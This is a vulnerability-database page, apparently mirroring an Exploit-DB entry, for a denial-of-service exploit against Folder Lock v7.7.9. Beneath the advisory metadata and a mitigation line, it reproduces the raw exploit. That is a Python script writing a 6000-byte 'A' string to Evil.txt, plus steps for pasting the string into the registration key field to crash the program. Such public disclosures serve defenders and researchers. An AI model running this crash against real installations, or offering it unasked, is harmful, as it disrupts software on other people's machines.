Folder Lock v7.7.9 Denial of Service Exploit

vendor:

Folder Lock

by:

Achilles

7.8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Folder Lock

Affected Version From: 7.7.9

Affected Version To: 7.7.9

Patch Exists: YES

Related CWE: N/A

CPE: a:newsoftwares.net:folder_lock:7.7.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64

2019

Folder Lock v7.7.9 Denial of Service Exploit

A buffer overflow vulnerability exists in Folder Lock v7.7.9, which allows an attacker to cause a denial of service condition by sending a specially crafted serial number and registration key. An attacker can exploit this vulnerability by running a python code to create a file containing a 6000 byte long string, copying the content of the file to the clipboard, opening Folder Lock, clicking 'Enter Key', pasting the content of the file into the 'Serial Number and Registration Key' field, and clicking 'Submit'. This will cause a crash.

Mitigation:

Upgrade to the latest version of Folder Lock.

Source

Exploit-DB raw data:

# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link:  https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64


# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"